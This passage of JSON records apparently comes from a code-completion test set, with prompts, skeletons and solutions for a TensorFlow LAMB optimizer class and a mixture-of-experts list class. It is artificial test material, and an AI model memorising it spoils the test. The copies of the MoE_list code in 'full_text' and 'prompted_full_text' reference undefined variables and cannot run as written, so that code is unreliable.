"stack_v2_sparse_classes_10k_test_000331", "length_bytes": 25398, "license_type": "permissive", "methods": [{"docstring": "Constructs a LAMBOptimizer.", "name": "__init__", "signature": "def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer')"}, {"docstring": "See base class.", "name": "apply_gradients", "signature": "def apply_gradients(self, grads_and_vars, global_step=None, name=None, learning_rate=None)"}, {"docstring": "Whether to use L2 weight decay for `param_name`.", "name": "_do_use_weight_decay", "signature": "def _do_use_weight_decay(self, param_name)"}, {"docstring": "Whether to do layer-wise learning rate adaptation for `param_name`.", "name": "_do_layer_adaptation", "signature": "def _do_layer_adaptation(self, param_name)"}, {"docstring": "Get the variable name from the tensor name.", "name": "_get_variable_name", "signature": "def _get_variable_name(self, param_name)"}], "n_methods": 5, "prompt": "Implement the Python class `LAMBOptimizer_v2` described below.\n\nClass description:\nLAMB (Layer-wise Adaptive Moments optimizer for Batch training).\n\nMethod signatures and docstrings:\n- def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer'): Constructs a LAMBOptimizer.\n- def apply_gradients(self, grads_and_vars, global_step=None, name=None, learning_rate=None): See base class.\n- def _do_use_weight_decay(self, param_name): Whether to use L2 weight decay for `param_name`.\n- def _do_layer_adaptation(self, param_name): Whether to do layer-wise learning rate adaptation for `param_name`.\n- def _get_variable_name(self, param_name): Get the variable name from the tensor name.", "prompted_full_text": "Implement the Python class `LAMBOptimizer_v2` described below.\n\nClass description:\nLAMB (Layer-wise Adaptive Moments optimizer for Batch training).\n\nMethod signatures and docstrings:\n- def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer'): Constructs a LAMBOptimizer.\n- def apply_gradients(self, grads_and_vars, global_step=None, 
name=None, learning_rate=None): See base class.\n- def _do_use_weight_decay(self, param_name): Whether to use L2 weight decay for `param_name`.\n- def _do_layer_adaptation(self, param_name): Whether to do layer-wise learning rate adaptation for `param_name`.\n- def _get_variable_name(self, param_name): Get the variable name from the tensor name.\n\n<|skeleton|>\nclass LAMBOptimizer_v2:\n \"\"\"LAMB (Layer-wise Adaptive Moments optimizer for Batch training).\"\"\"\n\n def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer'):\n \"\"\"Constructs a LAMBOptimizer.\"\"\"\n <|body_0|>\n\n def apply_gradients(self, grads_and_vars, global_step=None, name=None, learning_rate=None):\n \"\"\"See base class.\"\"\"\n <|body_1|>\n\n def _do_use_weight_decay(self, param_name):\n \"\"\"Whether to use L2 weight decay for `param_name`.\"\"\"\n <|body_2|>\n\n def _do_layer_adaptation(self, param_name):\n \"\"\"Whether to do layer-wise learning rate adaptation for `param_name`.\"\"\"\n <|body_3|>\n\n def _get_variable_name(self, param_name):\n \"\"\"Get the variable name from the tensor name.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(LAMBOptimizer_v2, self).__init__(False, name)\n self.learning_rate = learning_rate\n self.weight_decay_rate = weight_decay_rate\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n self.epsilon = epsilon\n self.exclude_from_weight_decay = exclude_from_weight_decay\n self.include_in_weight_decay = include_in_weight_decay\n if exclude_from_layer_adaptation:\n self.exclude_from_layer_adaptation = exclude_from_layer_adaptation\n else:\n self.exclude_from_layer_adaptation = exclude_from_weight_decay\n<|end_body_0|>\n\n<|body_start_1|>\n assignments = []\n if learning_rate is None:\n learning_rate = self.learning_rate\n tf.logging.info('***** use default learning rate ***** ', learning_rate)\n else:\n tf.logging.info('***** use provided learning rate ***** ', learning_rate)\n for grad, param in grads_and_vars:\n if grad is None or param is None:\n continue\n param_name = self._get_variable_name(param.name)\n tf.logging.info('***** apply gradients parameter name ***** %s', param_name)\n tf.logging.info('***** param: %s learning rate: %s ***** ', param_name, str(learning_rate))\n m = tf.get_variable(name=param_name + '/adam_m', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n v = tf.get_variable(name=param_name + '/adam_v', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n next_m = tf.multiply(self.beta_1, m) + tf.multiply(1.0 - self.beta_1, grad)\n next_v = tf.multiply(self.beta_2, v) + tf.multiply(1.0 - self.beta_2, tf.square(grad))\n update = next_m / (tf.sqrt(next_v) + self.epsilon)\n if self._do_use_weight_decay(param_name):\n update += self.weight_decay_rate * param\n ratio = 1.0\n if self._do_layer_adaptation(param_name):\n w_norm = linalg_ops.norm(param, ord=2)\n g_norm = linalg_ops.norm(update, ord=2)\n ratio = array_ops.where(math_ops.greater(w_norm, 0), array_ops.where(math_ops.greater(g_norm, 0), w_norm / g_norm, 1.0), 1.0)\n update_with_lr = ratio * learning_rate * update\n next_param = param - update_with_lr\n assignments.extend([param.assign(next_param), m.assign(next_m), v.assign(next_v)])\n return tf.group(*assignments, 
name=name)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.weight_decay_rate:\n return False\n if self.include_in_weight_decay:\n for r in self.include_in_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Include %s in weight decay', param_name)\n return True\n if self.exclude_from_weight_decay:\n for r in self.exclude_from_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Adam WD excludes %s', param_name)\n return False\n return True\n<|end_body_2|>\n\n<|body_start_3|>\n if self.exclude_from_layer_adaptation:\n for r in self.exclude_from_layer_adaptation:\n if re.search(r, param_name) is not None:\n return False\n return True\n<|end_body_3|>\n\n<|body_start_4|>\n m = re.match('^(.*):\\\\d+$', param_name)\n if m is not None:\n param_name = m.group(1)\n return param_name\n<|end_body_4|>\n", "revision_id": "480c909e0835a455606e829310ff949c9dd23549", "skeleton": "<|skeleton|>\nclass LAMBOptimizer_v2:\n \"\"\"LAMB (Layer-wise Adaptive Moments optimizer for Batch training).\"\"\"\n\n def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer'):\n \"\"\"Constructs a LAMBOptimizer.\"\"\"\n <|body_0|>\n\n def apply_gradients(self, grads_and_vars, global_step=None, name=None, learning_rate=None):\n \"\"\"See base class.\"\"\"\n <|body_1|>\n\n def _do_use_weight_decay(self, param_name):\n \"\"\"Whether to use L2 weight decay for `param_name`.\"\"\"\n <|body_2|>\n\n def _do_layer_adaptation(self, param_name):\n \"\"\"Whether to do layer-wise learning rate adaptation for `param_name`.\"\"\"\n <|body_3|>\n\n def _get_variable_name(self, param_name):\n \"\"\"Get the variable name from the tensor name.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LAMBOptimizer_v2:\n \"\"\"LAMB (Layer-wise Adaptive Moments optimizer for Batch training).\"\"\"\n\n def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer'):\n \"\"\"Constructs a LAMBOptimizer.\"\"\"\n super(LAMBOptimizer_v2, self).__init__(False, name)\n self.learning_rate = learning_rate\n self.weight_decay_rate = weight_decay_rate\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n self.epsilon = epsilon\n self.exclude_from_weight_decay = exclude_from_weight_decay\n self.include_in_weight_decay = include_in_weight_decay\n if exclude_from_layer_adaptation:\n self.exclude_from_layer_adaptation = exclude_from_layer_adaptation\n else:\n self.exclude_from_layer_adaptation = exclude_from_weight_decay\n\n def apply_gradients(self, grads_and_vars, global_step=None, name=None, learning_rate=None):\n \"\"\"See base class.\"\"\"\n assignments = []\n if learning_rate is None:\n learning_rate = self.learning_rate\n tf.logging.info('***** use default learning rate ***** ', learning_rate)\n else:\n tf.logging.info('***** use provided learning rate ***** ', learning_rate)\n for grad, param in grads_and_vars:\n if grad is None or param is None:\n continue\n param_name = self._get_variable_name(param.name)\n tf.logging.info('***** apply gradients parameter name ***** %s', param_name)\n tf.logging.info('***** param: %s learning rate: 
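
# A NumPy sketch of the update that apply_gradients implements in this
# record: Adam-style moments without bias correction (matching the recorded
# code), optional decoupled weight decay, then a per-parameter trust ratio
# ||w|| / ||update|| rescaling the learning rate. Values are illustrative.
# Note: the recorded tf.logging.info('***** use default learning rate ***** ',
# learning_rate) calls pass an argument without a %s placeholder, so that
# message will not format as intended at runtime.
import numpy as np

def lamb_step(param, grad, m, v, lr, beta1=0.9, beta2=0.999, eps=1e-6, wd=0.01):
    m = beta1 * m + (1.0 - beta1) * grad
    v = beta2 * v + (1.0 - beta2) * grad ** 2
    update = m / (np.sqrt(v) + eps) + wd * param   # decoupled weight decay
    w_norm, g_norm = np.linalg.norm(param), np.linalg.norm(update)
    ratio = w_norm / g_norm if w_norm > 0 and g_norm > 0 else 1.0
    return param - ratio * lr * update, m, v

p, m, v = np.ones(4), np.zeros(4), np.zeros(4)
p, m, v = lamb_step(p, 0.1 * np.ones(4), m, v, lr=0.001)
print(p)  # all entries slightly below 1.0
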
%s ***** ', param_name, str(learning_rate))\n            m = tf.get_variable(name=param_name + '/adam_m', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n            v = tf.get_variable(name=param_name + '/adam_v', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n            next_m = tf.multiply(self.beta_1, m) + tf.multiply(1.0 - self.beta_1, grad)\n            next_v = tf.multiply(self.beta_2, v) + tf.multiply(1.0 - self.beta_2, tf.square(grad))\n            update = next_m / (tf.sqrt(next_v) + self.epsilon)\n            if self._do_use_weight_decay(param_name):\n                update += self.weight_decay_rate * param\n            ratio = 1.0\n            if self._do_layer_adaptation(param_name):\n                w_norm = linalg_ops.norm(param, ord=2)\n                g_norm = linalg_ops.norm(update, ord=2)\n                ratio = array_ops.where(math_ops.greater(w_norm, 0), array_ops.where(math_ops.greater(g_norm, 0), w_norm / g_norm, 1.0), 1.0)\n            update_with_lr = ratio * learning_rate * update\n            next_param = param - update_with_lr\n            assignments.extend([param.assign(next_param), m.assign(next_m), v.assign(next_v)])\n        return tf.group(*assignments, name=name)\n\n    def _do_use_weight_decay(self, param_name):\n        \"\"\"Whether to use L2 weight decay for `param_name`.\"\"\"\n        if not self.weight_decay_rate:\n            return False\n        if self.include_in_weight_decay:\n            for r in self.include_in_weight_decay:\n                if re.search(r, param_name) is not None:\n                    tf.logging.info('Include %s in weight decay', param_name)\n                    return True\n        if self.exclude_from_weight_decay:\n            for r in self.exclude_from_weight_decay:\n                if re.search(r, param_name) is not None:\n                    tf.logging.info('Adam WD excludes %s', param_name)\n                    return False\n        return True\n\n    def _do_layer_adaptation(self, param_name):\n        \"\"\"Whether to do layer-wise learning rate adaptation for `param_name`.\"\"\"\n        if self.exclude_from_layer_adaptation:\n            for r in self.exclude_from_layer_adaptation:\n                if re.search(r, param_name) is not None:\n                    return False\n        return True\n\n    def _get_variable_name(self, param_name):\n        \"\"\"Get the variable name from the tensor name.\"\"\"\n        m = re.match('^(.*):\\\\d+$', param_name)\n        if m is not None:\n            param_name = m.group(1)\n        return param_name\n", "source": "the_stack_v2_python_sparse", "source_path": "t2t_bert/optimizer/optimizer_utils.py", "source_repo": "yyht/BERT", "split": "test", "star_events_count": 37} {"blob_id": "2d963f97e1d156da99ddb4473f36552dae6ae79b", "bodies": ["self.K = K\nself.MoE_list = []\nif folder is not None:\n    self.MoE_list = [None for k in range(K)]\n    self.D = D\n    self.load(folder)\nelse:\n    if type(N_exp_list) is int:\n        N_exp_list = [N_exp_list for k in range(self.K)]\n    if len(N_exp_list) != self.K:\n        raise TypeError(\"Length of number of experts list doesn't match number of models!\")\n    self.D = D\n    for k in range(self.K):\n        self.MoE_list.append(MoE_model(self.D, N_exp_list[k]))\nreturn", "file_list = os.listdir(folder)\nD_list = []\nself.N_exp_list = [None for k in range(self.K)]\nfor k in range(self.K):\n    if 'gat_' + str(k) not in file_list or 'exp_' + str(k) not in file_list:\n        raise RuntimeError(\"Couldn't find proper files for MoE model \" + str(k))\n    self.MoE_list[k] = MoE_model(self.D, 1)\n    self.MoE_list[k].load(folder + 'exp_' + str(k), folder + 'gat_' + str(k), load_function=load_function)\n    D, N_exp = self.MoE_list[k].get_iperparams()\n    D_list.append(D)\n    self.N_exp_list[k] = N_exp\nassert len(set(D_list)) == 1\nself.D = D_list[0]\nreturn", "for k in range(self.K):\n    self.MoE_list[k].save(folder + 'exp_' + str(k), folder + 'gat_' + str(k))\nreturn", "if args_list is None:\n    args_list = [() for k in range(self.K)]\nif type(args_list) is tuple:\n    args_list = [args_list for k in
range(self.K)]\nassert y_train.shape[1] == self.K\nassert X_train.shape[0] == y_train.shape[0]\nassert X_train.shape[1] == self.D\nfor k in range(self.K):\n    print('Fitting component ', k)\n    y_k = y_train[:, k]\n    self.MoE_list[k].fit(X_train, y_k, *args_list[k])\nreturn", "if k_list is None:\n    k_list = range(self.K)\nreturn [self.MoE_list[k] for k in k_list]", "assert X.shape[1] == self.D\ny = np.zeros((X.shape[0], self.K))\nfor k in range(self.K):\n    y[:, k] = self.MoE_list[k].predict(X)\nreturn y"], "bodies_text": "<|body_start_0|>\n    self.K = K\n    self.MoE_list = []\n    if folder is not None:\n        self.MoE_list = [None for k in range(K)]\n        self.D = D\n        self.load(folder)\n    else:\n        if type(N_exp_list) is int:\n            N_exp_list = [N_exp_list for k in range(self.K)]\n        if len(N_exp_list) != self.K:\n            raise TypeError(\"Length of number of experts list doesn't match number of models!\")\n        self.D = D\n        for k in range(self.K):\n            self.MoE_list.append(MoE_model(self.D, N_exp_list[k]))\n    return\n<|end_body_0|>\n\n<|body_start_1|>\n    file_list = os.listdir(folder)\n    D_list = []\n    self.N_exp_list = [None for k in range(self.K)]\n    for k in range(self.K):\n        if 'gat_' + str(k) not in file_list or 'exp_' + str(k) not in file_list:\n            raise RuntimeError(\"Couldn't find proper files for MoE model \" + str(k))\n        self.MoE_list[k] = MoE_model(self.D, 1)\n        self.MoE_list[k].load(folder + 'exp_' + str(k), folder + 'gat_' + str(k), load_function=load_function)\n        D, N_exp = self.MoE_list[k].get_iperparams()\n        D_list.append(D)\n        self.N_exp_list[k] = N_exp\n    assert len(set(D_list)) == 1\n    self.D = D_list[0]\n    return\n<|end_body_1|>\n\n<|body_start_2|>\n    for k in range(self.K):\n        self.MoE_list[k].save(folder + 'exp_' + str(k), folder + 'gat_' + str(k))\n    return\n<|end_body_2|>\n\n<|body_start_3|>\n    if args_list is None:\n        args_list = [() for k in range(self.K)]\n    if type(args_list) is tuple:\n        args_list = [args_list for k in range(self.K)]\n    assert y_train.shape[1] == self.K\n    assert X_train.shape[0] == y_train.shape[0]\n    assert X_train.shape[1] == self.D\n    for k in range(self.K):\n        print('Fitting component ', k)\n        y_k = y_train[:, k]\n        self.MoE_list[k].fit(X_train, y_k, *args_list[k])\n    return\n<|end_body_3|>\n\n<|body_start_4|>\n    if k_list is None:\n        k_list = range(self.K)\n    return [self.MoE_list[k] for k in k_list]\n<|end_body_4|>\n\n<|body_start_5|>\n    assert X.shape[1] == self.D\n    y = np.zeros((X.shape[0], self.K))\n    for k in range(self.K):\n        y[:, k] = self.MoE_list[k].predict(X)\n    return y\n<|end_body_5|>\n", "class_docstring": "This class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.", "class_name": "MoE_list", "detected_licenses": ["CC-BY-4.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MoE_list:\n    \"\"\"This class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.\"\"\"\n\n    def __init__(self, K, folder=None, D=1, N_exp_list=10):\n        \"\"\"Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts.
Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. (If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)\"\"\"\n <|body_0|>\n\n def load(self, folder, load_function=None):\n \"\"\"Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)\"\"\"\n <|body_1|>\n\n def save(self, folder):\n \"\"\"Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. Input: folder name of the folder to save files to\"\"\"\n <|body_2|>\n\n def fit(self, X_train, y_train, args_list=None):\n \"\"\"Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure\"\"\"\n <|body_3|>\n\n def models(self, k_list=None):\n \"\"\"Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned\"\"\"\n <|body_4|>\n\n def predict(self, X):\n \"\"\"Makes predictions for all the models. Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.K = K\n if folder is not None:\n self.MoE_list = [None for k in range(K)]\n self.load(folder)\n else:\n if type(N_exp_list) is int:\n N_exp_list = [N_exp_list for k in range(self.K)]\n if len(N_exp_list) != self.K:\n raise TypeError(\"Lenght of number of expters list doesn't match number of models!\")\n self.D = D\n for k in range(self.K):\n self.MoE_list.append(MoE_model(self.D, N_exp_list[k]))\n return\n<|end_body_0|>\n\n<|body_start_1|>\n file_list = os.listdir(folder)\n D_list = []\n for k in range(self.K):\n if 'gat_' + str(k) not in file_list or 'exp_' + str(k) not in file_list:\n raise RuntimeError(\"Couldn't find proper files for MoE model \" + str(k))\n self.MoE_list[k] = MoE_model(self.D, 1)\n self.MoE_list[k].load(folder + 'exp_' + str(k), folder + 'gat_' + str(k), load_function=load_function)\n D, N_exp = MoE_list[k].get_iperparams()\n D_list.append(D)\n self.N_exp_list[k] = N_exp\n assert len(set(D_list)) == 1\n self.D = D_list[0]\n return\n<|end_body_1|>\n\n<|body_start_2|>\n for k in range(self.K):\n self.MoE_list[k].save(folder + 'exp_' + str(k), folder + 'gat_' + str(k))\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if type(arg_list) is tuple:\n arg_list = [arg_list for k in range(self.K)]\n assert y_train.shape[1] == self.K\n assert X_train.shape[0] == y_train.shape[0]\n assert X.shape[1] == self.D\n for k in range(self.K):\n print('Fitting component ', k)\n y_train = PCA_train_ph[:, k]\n MoE_models[k].fit(train_theta, y_train, *arg_list[k])\n return\n<|end_body_3|>\n\n<|body_start_4|>\n if k_list is None:\n k_list = range(self.K)\n return self.MoE_list[k]\n<|end_body_4|>\n\n<|body_start_5|>\n assert X.shape[1] == self.D\n y = 
np.zeros((X_test.shape[0], self.K))\n for k in range(self.K):\n y[:, k] = self.MoE_list[k].predict(X)\n return y\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000332", "length_bytes": 4450, "license_type": "permissive", "methods": [{"docstring": "Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts. Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. (If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)", "name": "__init__", "signature": "def __init__(self, K, folder=None, D=1, N_exp_list=10)"}, {"docstring": "Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)", "name": "load", "signature": "def load(self, folder, load_function=None)"}, {"docstring": "Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. Input: folder name of the folder to save files to", "name": "save", "signature": "def save(self, folder)"}, {"docstring": "Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure", "name": "fit", "signature": "def fit(self, X_train, y_train, args_list=None)"}, {"docstring": "Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned", "name": "models", "signature": "def models(self, k_list=None)"}, {"docstring": "Makes predictions for all the models. Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model", "name": "predict", "signature": "def predict(self, X)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_006026", "prompt": "Implement the Python class `MoE_list` described below.\n\nClass description:\nThis class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.\n\nMethod signatures and docstrings:\n- def __init__(self, K, folder=None, D=1, N_exp_list=10): Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts. Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. 
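As stored, the MoE_list record's `fit` body cannot run: the parameter is `args_list` but the body reads `arg_list`, one assertion references an undefined `X`, and the loop fits `MoE_models[k]` on `train_theta` and `PCA_train_ph` (apparent leftovers from a calling script) while also overwriting the `y_train` argument. A sketch of the evident intent, assuming `MoE_model.fit(X, y, *args)` accepts the documented arguments positionally:

    def fit(self, X_train, y_train, args_list=None):
        if args_list is None:
            args_list = [() for _ in range(self.K)]         # rely on MoE_model.fit defaults
        elif isinstance(args_list, tuple):
            args_list = [args_list for _ in range(self.K)]  # one tuple shared by every fit
        assert X_train.shape[0] == y_train.shape[0]
        assert X_train.shape[1] == self.D
        assert y_train.shape[1] == self.K
        for k in range(self.K):
            print('Fitting component', k)
            # the k-th model regresses the k-th target dimension
            self.MoE_list[k].fit(X_train, y_train[:, k], *args_list[k])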
(If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)\n- def load(self, folder, load_function=None): Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)\n- def save(self, folder): Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. Input: folder name of the folder to save files to\n- def fit(self, X_train, y_train, args_list=None): Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure\n- def models(self, k_list=None): Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned\n- def predict(self, X): Makes predictions for all the models. Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model", "prompted_full_text": "Implement the Python class `MoE_list` described below.\n\nClass description:\nThis class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.\n\nMethod signatures and docstrings:\n- def __init__(self, K, folder=None, D=1, N_exp_list=10): Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts. Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. (If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)\n- def load(self, folder, load_function=None): Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)\n- def save(self, folder): Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. Input: folder name of the folder to save files to\n- def fit(self, X_train, y_train, args_list=None): Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. 
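The record's `load` body has two smaller defects: it builds paths by string concatenation (`folder + 'exp_' + str(k)`), which silently requires a trailing separator on `folder`, and it calls `MoE_list[k].get_iperparams()` without `self.`; in addition, `self.N_exp_list` is never created by the stored `__init__`. A hedged repair using `os.path.join`, assuming `MoE_model` is in scope as in the record:

    import os

    def load(self, folder, load_function=None):
        file_list = os.listdir(folder)
        D_list = []
        self.N_exp_list = [None] * self.K   # never initialised in the stored __init__
        for k in range(self.K):
            if 'gat_%d' % k not in file_list or 'exp_%d' % k not in file_list:
                raise RuntimeError("Couldn't find proper files for MoE model %d" % k)
            self.MoE_list[k] = MoE_model(self.D, 1)
            # os.path.join works with or without a trailing separator on folder
            self.MoE_list[k].load(os.path.join(folder, 'exp_%d' % k),
                                  os.path.join(folder, 'gat_%d' % k),
                                  load_function=load_function)
            D, N_exp = self.MoE_list[k].get_iperparams()   # was: MoE_list[k]
            D_list.append(D)
            self.N_exp_list[k] = N_exp
        assert len(set(D_list)) == 1, 'loaded models disagree on input dimension'
        self.D = D_list[0]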
Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure\n- def models(self, k_list=None): Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned\n- def predict(self, X): Makes predictions for all the models. Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model\n\n<|skeleton|>\nclass MoE_list:\n \"\"\"This class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.\"\"\"\n\n def __init__(self, K, folder=None, D=1, N_exp_list=10):\n \"\"\"Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts. Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. (If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)\"\"\"\n <|body_0|>\n\n def load(self, folder, load_function=None):\n \"\"\"Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)\"\"\"\n <|body_1|>\n\n def save(self, folder):\n \"\"\"Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. Input: folder name of the folder to save files to\"\"\"\n <|body_2|>\n\n def fit(self, X_train, y_train, args_list=None):\n \"\"\"Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure\"\"\"\n <|body_3|>\n\n def models(self, k_list=None):\n \"\"\"Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned\"\"\"\n <|body_4|>\n\n def predict(self, X):\n \"\"\"Makes predictions for all the models. 
